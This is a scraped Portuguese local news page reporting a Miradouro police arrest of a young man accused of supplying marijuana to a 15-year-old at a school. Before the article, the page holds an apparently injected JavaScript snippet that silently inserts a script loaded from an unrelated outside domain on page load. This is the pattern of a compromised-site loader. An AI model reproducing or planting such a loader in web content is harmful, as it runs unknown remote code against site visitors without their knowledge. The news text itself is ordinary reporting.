;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PM de Miradouro prende mais um acusado de tráfico e corrupção de menores. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PM de Miradouro prende mais um acusado de tráfico e corrupção de menores.

Um jovem de 19 anos foi preso por policiais militares de Miradouro, acusado de tráfico de drogas e corrupção de menores. Ele teria fornecido tabletes de maconha a um adolescente de 15 anos, em uma escola daquela cidade. O caso aconteceu ontem (2), e é o segundo da mesma natureza em apenas cinco dias. O detalhe é que a outra ocorrência foi protagonizada pela mãe do rapaz preso ontem.
De acordo com a PM, tudo começou quando o diretor da escola acionou os militares e contou que um homem havia levado drogas para um dos alunos na porta da instituição, e que, na sequência, o estudante repassou o material a um colega de sala.
Os policiais foram à escola e, após buscas nos pertences dos dois menores, na sala da Diretoria e na presença de testemunhas, foram encontrados, na mochila de um deles, dois tabletes de maconha e os chamados “sacolés” para embalar drogas.
O outro adolescente assumiu a propriedade de um dos tabletes de maconha e se negou a informar para quem seria o outro. Ele confirmou a identidade do fornecedor e os militares seguiram, então, para a residência do suposto traficante que, de acordo com a PM, já é conhecido por envolvimento com o tráfico. O rapaz foi preso.
O jovem, os menores e o material apreendido foram encaminhados à Delegacia do bairro Safira, em Muriaé, e apresentados à Polícia Civil.


Fonte : Radio Muriaé


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.